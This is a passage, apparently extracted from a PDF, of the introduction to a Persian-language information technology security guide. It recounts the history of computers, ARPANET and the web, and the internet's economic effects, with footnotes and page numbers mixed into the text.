ﺩﻳﮕﺮ ﺑﺨﺸﻬﺎﻱ ﺟﺎﻣﻌﻪ ﻧﻤﺎﻳﺎﻥ ﺍﺳﺖ .ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ
ﻛﺸﻮﺭﻫﺎ ﻭ ﻣﺮﺩﻡ ﻣﻔﻴﺪ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺬﺍﺑﻴﺖ ﺧﺎﺻﻲ ﺑـﺮﺍﻱ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﻛﻤﻚ ﻛﻨـﺪ ﺗـﺎ
ﺍﻧﺴﺠﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳـﻤﺖ ﺟﺎﻣﻌـﺔ ﺍﻗﺘـﺼﺎﺩﻱ ﺟﻬـﺎﻧﻲ ﺍﻓـﺰﺍﻳﺶ
ﺩﻫﻨﺪ؛ ﻭﻟﻲ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎ ﻫﺰﻳﻨـﺔ
ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ .ﺳــﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﻣــﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﻭ ﺍﻃﻤﻴﻨــﺎﻥ ﻭ
ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ،ﺑﺴﺘﮕﻲ ﺑﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻦ
ﻭ ﻛﺎﺭﺁﻣﺪ ﻓﻨﺎﻭﺭﻱ ﻭ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺩﺍﺭﺩ .ﺩﻭﻟﺘﻬﺎ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ
ﺧﺎﻧﮕﻲ ﻫﻤﮕـﻲ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪﻫـﺎ ﻭ ﺳـﺮﻣﺎﻳﻪﻫـﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﺁﻧﻬﺎ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﻧـﺪ .ﺍﻳـﻦ ﻛﺘـﺎﺏ
ﺣﺎﻭﻱ ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩ ﻫـﺎﻱ ﺭﺍﻳـﺞ ﻭ ﺍﻟﮕﻮﻫـﺎﻱ
ﺳــﺮﺁﻣﺪﻱ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ﺍﺳــﺖ ﻛــﻪ ﺑــﻪ ﺧﻮﺍﻧﻨــﺪﮔﺎﻥ ﺩﺭ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ -ﺑـﺮ ﺣـﺴﺐ ﺷـﺮﺍﻳﻂ -ﻛﻤـﻚ
Workstation
Denial of Service
Programmed Threats
Auditing Tools
24
25
26
27
Universal Copyright Convention
28
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﻣﻘﺪﻣﻪ
ﻇﻬﻮﺭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻳﻜﻲ ﺍﺯ ﺑﺎﺭﺯﺗﺮﻳﻦ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ
ﺩﺭ ﻧﻴﻢﻗﺮﻥ ﺍﺧﻴﺮ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺁﻳﺪ ﻛـﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻛﻨـﻮﻧﻲ ﺑـﺸﺮ
ﺑﺼﻮﺭﺕ ﻋﺎﻣﻠﻲ ﺣﻴﺎﺗﻲ ﺩﺭﺁﻣﺪﻩ ﺍﺳﺖ ١.ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺍﻳـﻦ
ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻗﺎﻟﺐ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺗﺠﻠـﻲ ﻛـﺮﺩﻩ ﻭ ﺑـﻪ
ﺍﺑﺰﺍﺭﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﻭ ﺭﻓﻊ ﻧﻴﺎﺯﻫﺎﻱ ﺷﺨﺼﻲ ﺗﺒـﺪﻳﻞ
ﺷﺪﻩ ﺍﺳـﺖ .ﺩﺭ ﺳـﺎﻝ ۱۹۵۱ﻣـﻴﻼﺩﻱ ﺯﻣﺎﻧﻴﻜـﻪ ﺍﻭﻟـﻴﻦ ﺭﺍﻳﺎﻧـﺔ
ﺩﻳﺠﻴﺘﺎﻝ ﺗﺠﺎﺭﻱ ﻣﻮﺳﻮﻡ ﺑﻪ UNIVAC Iﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺁﻣـﺎﺭ ﻭ
ﺳﺮﺷﻤﺎﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺁﻣﺮﻳﻜﺎ ٢ﺗﺤﻮﻳﻞ ﺩﺍﺩﻩ ﺷﺪ ،ﺑﺴﻴﺎﺭﻱ ﺍﺯ
ﻣﺮﺩﻡ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭼﻴﺰﻱ ﻧﻤﻲﺩﺍﻧﺴﺘﻨﺪ ﻭ ﺁﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧﻴـﺰ
ﺗﻨﻬﺎ ﺩﺭ ﺗﻌﺪﺍﺩ ﺍﻧﮕﺸﺖ ﺷﻤﺎﺭﻱ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﺁﺯﻣﺎﻳـﺸﮕﺎﻫﻬﺎﻱ
ﺗﺤﻘﻴﻘﺎﺗﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻨﺪ .ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺰﺭﮒ ،ﮔﺮﺍﻥ
ﻭ ﻣﻤﻠﻮ ﺍﺯ ﺍﺷﻜﺎﻝ ﺑﻮﺩﻧﺪ .ﺩﺭ ﻣﻘﺎﺑﻞ ،ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻧﺪﺍﺯﻩﺍﻱ
ﻧﺴﺒﺘﹰﺎ ﻛﻮﭼﻚ ﺩﺍﺭﻧﺪ ،ﺍﺭﺯﺍﻥ ﻭ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻣـﻲﺗـﻮﺍﻥ
ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺸﻮﺭﻱ ﻳﺎﻓﺖ.
ﺑــﻪ ﻓﺎﺻــﻠﺔ ﻛﻮﺗــﺎﻫﻲ ﭘــﺲ ﺍﺯ ﺭﻭﺍﺝ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﺩﺭ ﺩﺍﻧــﺸﮕﺎﻫﻬﺎ،
ﭘﺮﻭﮊﻩﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺑﺮﺍﻱ ﻣﺮﺗﺒﻂ ﺳﺎﺧﺘﻦ ﺁﻧﻬﺎ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ
ﻧﺤﻮﻱ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﺒﺎﺩﻟﺔ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺟـﻮﺩ ﺁﻳـﺪ ﺁﻏـﺎﺯ
ﺷــﺪﻧﺪ .ﺍﺯ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﭘــﺮﻭﮊﻩﻫــﺎ ،ﭘــﺮﻭﮊﺓ ﺗﻮﺳــﻌﺔ ﺷــﺒﻜﺔ
ARPANETﻣﻮﻓﻘﻴﺖ ﺑﻴﺸﺘﺮﻱ ﻛﺴﺐ ﻛﺮﺩ ﻭ ﺑـﻪ ﺁﻥ ﭼﻴـﺰﻱ
ﺗﺒﺪﻳﻞ ﺷﺪ ﻛﻪ ﺍﻣﺮﻭﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ "ﺍﻳﻨﺘﺮﻧﺖ" ﻣﻲﺷﻨﺎﺳﻴﻢ ﻭ ﺩﺭﺣﺎﻝ
ﺣﺎﺿﺮ ﺑﻴﺶ ﺍﺯ ۳۰۰ﻣﻴﻠﻴﻮﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑـﻪ ﻫـﻢ
ﻣﺮﺗﺒﻂ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ٣ﻛﻪ ﺗﻮﺳﻂ ﺗﻴﻢ ﺑﺮﻧﺮﺯ ﻟﻲ ٤ﻭ ﺭﺍﺑـﺮﺕ ﻛـﺎﻳﻠﻴﻮ
ﺩﺭ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻘﺎﺕ ﻫﺴﺘﻪﺍﻱ ﺍﺭﻭﭘﺎ ٦ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ۹۰ﻣﻴﻼﺩﻱ ﻭ
ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺟﻬـﺎﻧﻲ ﺑﻬـﺮﻩ ﺟـﺴﺘﻪ ﻭ
ﺑﻬﺮﻩﻭﺭﻱ ﻭ ﺟﺬﺍﺑﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﻣﺮﺍﺗﺐ ﺍﻓـﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺍﺳـﺖ.
ﻫﺮ ﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺗﻔـﺎﻭﺗﻲ ﻣﻴـﺎﻥ ﺷـﺒﻜﺔ ﺟﻬـﺎﻧﻲ ﻭﺏ ﻭ
ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺋﻞ ﻧﻴـﺴﺘﻨﺪ ،ﻭﻟـﻲ ﺩﺭ ﻭﺍﻗـﻊ ﻭﺏ ﺗﻨﻬـﺎ ﻳﻜـﻲ ﺍﺯ ﺍﻳـﻦ
ﺧﺪﻣﺎﺕ) ٧ﻭ ﺍﻟﺒﺘﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ( ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﭼﻨﻴﻦ ﺍﺑﺰﺍﺭ
ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺍﻃـﻼﻉﺭﺳـﺎﻧﻲ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺗﺒـﺪﻳﻞ
ﻛﺮﺩﻩ ﺍﺳﺖ.
ﻃﻲ ﺩﻩ ﺳﺎﻝ ﺍﺧﻴﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻳﻚ ﺍﺑـﺰﺍﺭ ﻣﻬـﻢ ﺍﺭﺗﺒـﺎﻃﻲ ﻣﻴـﺎﻥ
ﺗﻤﺎﻣﻲ ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻭ ﻣﺎ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺁﻧـﻲ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ،ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺍﺧﺘـﺼﺎﺻﻲ ،ﺗﻤـﺎﻣﻲ ﺍﻧـﻮﺍﻉ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ
ﻛﺎﺭﺑﺮﺩﻱ ،ﺗﺠﺎﺭﻱ ،ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﺑـﻪ ﺁﻥ
ﻭﺍﺑﺴﺘﻪ ﺍﻳﻢ .ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺩﺳﺘﺮﺳﻲ ﺁﺳﺎﻥ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ
ﻣﻮﻓﻘﻴﺖ ﭘﺎﻳﺪﺍﺭ ﻭ ﻣﺪﺍﻭﻡ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ ﻳـﻚ ﻋﺎﻣـﻞ
ﺣﻴﺎﺗﻲ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺍﻫﻤﻴﺖ ﺁﻥ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫـﺎﻱ ﺩﺭﺣـﺎﻝ
ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﺑﺴﺮﻋﺖ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ .ﺁﺛﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ
ﻭ ﻧﺘﺎﻳﺞ ﺣﺎﺻﻠﻪ ﺍﺯ ﺍﻧﻘﻼﺏ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻣﺮﺯ ﻓﻮﺍﻳـﺪ ﻣـﺴﺘﻘﻴﻢ ﺁﻧﻬـﺎ
ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﺄﺛﻴﺮﺍﺕ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺰ ﺩﺭ ﺭﺍﻩ
ﺑﺎﺷﻨﺪ.
ﺍﻭﻝ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺮﺯﻫﺎﻱ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ
ﻣﺘﺼﻞ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﻛﻤﺮﻧﮓ ﻛﺮﺩﻩ ﻭ ﺭﻭﻧﺪ ﺟﻬﺎﻧﻲﺳﺎﺯﻱ ﺭﺍ ﺑﺎ ﺍﺭﺍﺋـﻪ
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺗﺴﻬﻴﻞ ﻧﻤﻮﺩﻩ ﻭ ﻟـﺬﺍ ﻫـﺮ ﻛـﺴﻲ
ﻣﺴﺘﻘﻞ ﺍﺯ ﻣﺤﻞ ﻓﻴﺰﻳﻜﻲ ﺧﻮﺩ ﻗﺎﺩﺭ ﺑﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﺁﻥ
ﻣﻲﺑﺎﺷﺪ .ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ٨ﺑـﺮ ﺭﻭﻧـﺪ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺗـﺄﺛﻴﺮﻱ
ﻣﻀﺎﻋﻒ ﺩﺍﺷﺘﻪﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻧﺘﺎﻳﺞ ﺟﺴﺘﺠﻮ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﺿـﻮﻋﺎﺕ
ﻇﺎﻫﺮ ﻣﻲﺷﻮﻧﺪ ﻭ ﻧﻪ ﺑﺮ ﺍﺳﺎﺱ ﻓﺎﺻﻠﻪﺍﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺩﺍﺭﺩ؛
ﺏ ﻛﺎﺭﺧﺎﻧﺠــﺎﺕ ﻭ ﺷــﺮﻛﺘﻬﺎﻱ ﻭﺍﻗــﻊ ﺩﺭ
ﺑﻄﻮﺭﻳﻜــﻪ ﭘﺎﻳﮕــﺎﻩ ﻭ ﹺ
ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ ﻣﻮﻗﻌﻴـﺖ ﻳﻜـﺴﺎﻧﻲ
ﺑﺮﺍﻱ ﻧﻈﺎﺭﻩﺷﺪﻥ ﺗﻮﺳﻂ ﻣﺮﺍﺟﻌﻴﻦ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ.
٥
ﺩﺭ ﺷﻬﺮ ﮊﻧﻮ ﺍﻳﺠﺎﺩ ﺷﺪ ﺳﺮﻭﻳﺲ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ
Digital Tornado: The Internet and
Telecommunications Policy FCC Staff
Working Paper on Internet Policy (1997):
http://www.fcc.gov/Bureaus/Miscellaneous/Ne
ws_Releases/1997/nrmc7020.html
U.S. Bureau of Census
World-Wide Web
Tim Berners-Lee
Robert Cailliau
Center for European Nuclear Research
)(CERN
1
2
3
4
5
6
ﺩﻭﻣﻴﻦ ﻣﺴﺌﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺗﺄﺛﻴﺮﻱ ﺷﮕﺮﻑ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ
ﺣﺬﻑ ﻭﺍﺳﻄﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺍﺷﺘﻪ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ
ﺑــﻪ ﻛــﺎﻫﺶ ﭼــﺸﻤﮕﻴﺮ ﻧــﺮﺥ ﺍﺳــﺘﺨﺪﺍﻡ ﻣﻨــﺸﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ
ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺍﺷﺎﺭﻩﻛﺮﺩ ﻛﻪ ﺩﻟﻴﻞ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻮﺷﺘﻦ ﻣﺘﻦ ﻭ
ﭼﺎﭖ ﻭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺷﺨﺼﻲ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺯ ﻃﺮﻳـﻖ ﺗـﺴﻬﻴﻼﺗﻲ
ﭼﻮﻥ ﭘﺮﺩﺍﺯﺷﮕﺮ ﻛﻠﻤﺎﺕ ﻭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺁﺳـﺎﻧﺘﺮ ﺍﺯ ﺩﻳﻜﺘـﻪ
ﻛــﺮﺩﻥ ﻣــﺘﻦ ﺑــﺮﺍﻱ ﻳــﻚ ﻣﻨــﺸﻲ ﺍﺳــﺖ .ﺑــﻪ ﻫﻤــﻴﻦ ﺗﺮﺗﻴــﺐ
Services
Search Engine
7
8
٢٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻱ ﺩﺳﺘﻪﺟﻤﻌﻲ ﻧﻴﺰ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺭﻭ ﺑﻪ ﺍﻧﻘﺮﺍﺽ ﺍﺳﺖ،
ﮔﺮﺩﺷﮕﺮ ﹺ
ﭼﺮﺍﻛﻪ ﮔﺮﺩﺷـﮕﺮﺍﻥ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺑﻠﻴﻄﻬـﺎﻱ ﻫـﻮﺍﻳﻲ ﻳـﺎ ﻗﻄـﺎﺭ ﻭ
ﻫﻤﭽﻨﻴﻦ ﺍﺗﺎﻗﻬﺎﻱ ﻫﺘﻞ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑـﺮﺧﻂ ٩ﺭﺯﺭﻭ
ﻛﻨﻨﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨﻪ ﻭ ﻭﻗﺖ ﻣـﺸﺘﺮﻱ
ﺷﺪﻩ ﻭ ﺑﺎﻋﺚ ﺷﺪﻩ ﺑﺘﻮﺍﻥ ﺑﺎ ﻛﻤﻲ ﺩﻗﺖ ﺭﻭﻱ ﺳﻔﺎﺭﺷﺎﺕ ،ﺍﺯ ﻳـﻚ
ﺳﻔﺮ ﻣﻔﺮﺡ ﻟـﺬﺕ ﺑـﺮﺩ .ﭘﻴـﺪﺍﻳﺶ ﺷـﺮﻛﺘﻬﺎﻱ ﻓﺮﻭﺷـﻨﺪﺓ ﻛﺘـﺎﺏ،
ﻣﻮﺳﻴﻘﻲ ﻭ ﻣﺤـﺼﻮﻻﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺼﻮﺭﺕ ﺑـﺮﺧﻂ ﻣﻮﺟـﺐ
ﺗﻬﺪﻳــﺪ ﻭ ﺿــﺮﺑﻪ ﺑــﻪ ﻓﺮﻭﺷــﮕﺎﻫﻬﺎﻱ ﻋﺮﺿــﻪﻛﻨﻨــﺪﺓ ﺍﻳﻨﮕﻮﻧــﻪ
ﻣﺤﺼﻮﻻﺕ ﺷﺪﻩ ،ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﺍﻳﻦ
ﺻﻨﻒ ﺑﻪ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺷﺪﻥ ﻃﻴﻒ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﻧﻴﺰ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ.
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺣﺮﻓـﻪﻫـﺎ ﻭ ﺻـﻨﺎﻳﻊ ﺳـﻨﺘﻲ ﺑـﻪ ﻭﺟـﻮﺩ ﺧـﻮﺩ ﺍﺩﺍﻣـﻪ
ﻣﻲﺩﻫﻨﺪ ،ﺗﻤﺎﻳﻞ ﺩﺍﺭﻧﺪ ﺍﻓﺮﺍﺩ ﻛﻤﺘـﺮﻱ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭﺁﻭﺭﻧـﺪ ﻭ
ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺠـﺎﻱ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ﻋﻤـﻮﻣﻲ ﺑـﻪ ﺳـﻤﺖ
ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﺨﺼﺼﻲ ﺣﺮﻛﺖ ﻛﻨﻨﺪ .ﺗﺄﺛﻴﺮﺍﺕ ﻣﺸﻬﻮﺩ ﺭﻭﻧـﺪ ﺣـﺬﻑ
ﻭﺍﺳﻄﻪﻫﺎ ﻛﻪ ﺑﺎ ﻇﻬﻮﺭ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺷـﺮﻭﻉ ﺷـﺪ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ
ﻃﻮﻻﻧﻲ ﺍﺩﺍﻣﻪ ﺧﻮﺍﻫﺪ ﻳﺎﻓـﺖ ﻭ ﺑـﺎ ﺍﻫﻤﻴـﺖ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ ،ﺻﻨﺎﻳﻊ ﻭ ﺣﺮﻓﻪﻫﺎﻱ ﺑﻴﺸﺘﺮﻱ ﺑﺎ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﺧﻮﺍﻫﻨﺪ
ﺷﺪ.
ﺳﻮﻣﻴﻦ ﭘﻴﺎﻣﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﺮﺥ ﺑﻬـﺮﻩﻭﺭﻱ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺻـﻨﺎﻳﻊ
ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺷﺘﺎﺑﻲ ﭼﺸﻤﮕﻴﺮ ﺍﻓﺰﺍﻳﺶ ﺧﻮﺍﻫﺪ
ﻳﺎﻓﺖ .ﺑﻪ ﻛﻤـﻚ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﻣﻜـﺎﻥ ﺍﺭﺳـﺎﻝ ﻭ ﺗﺒـﺎﺩﻝ
ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻃﻲ ﺗﻨﻬﺎ ﭼﻨﺪ ﺛﺎﻧﻴـﻪ ﻣﻤﻜـﻦ ﺷـﺪﻩ،
ﺑﻄﻮﺭﻳﻜﻪ ﻣﺒﺎﺣﺚ ﻭ ﻣﺬﺍﻛﺮﺍﺕ ﺟﻬﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺴﻴﺎﺭ ﺳـﺮﻳﻌﺘﺮ
ﺍﺯ ﮔﺬﺷﺘﻪ ﭘﻴﮕﻴﺮﻱ ﻛﺮﺩ ﻭ ﺑﻪ ﻧﺘﻴﺠﻪ ﺭﺳﺎﻧﺪ .ﺍﻣﻮﺭ ﺑﺎﺯﺭﮔﺎﻧﻲ ﻛﻪ ﺗـﺎ
ﭼﻨﺪﻱ ﻗﺒﻞ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ،ﺗﻠﻜﺲ ﻭ ﺗﻠﻔـﻦ ﺍﻧﺠـﺎﻡ ﻣـﻲﺷـﺪﻧﺪ
ﺍﻛﻨﻮﻥ ﺑﺎ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻣﻔﺎﻫﻴﻤﻲ ﻧﻮﻳﻦ ﺩﺭ ﺻﻨﻌﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺳـﻴﺎﺭ،
ﺳﺮﻳﻌﺘﺮ ﻭ ﻛﺎﺭﺁﻣﺪﺗﺮ ﺑﻪ ﺍﻧﺠﺎﻡ ﻣـﻲﺭﺳـﻨﺪ ﻭ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﭼﺮﺧـﺔ
ﺯﻣﺎﻧﻲ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎ ﺭﺍ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﻳﻤﻦ ﻧﮕﺎﻩ ﺩﺍﺷـﺘﻦ ﻣﺤـﻞ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺧﻄﻮﻁ ﺍﺭﺗﺒﺎﻃﻲ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻧﻴـﺰ ﺩﺭ ﺍﻳـﻦ ﻣﺤـﻴﻂ ﺟﺪﻳـﺪ ﺍﻟﺰﺍﻣـﻲ
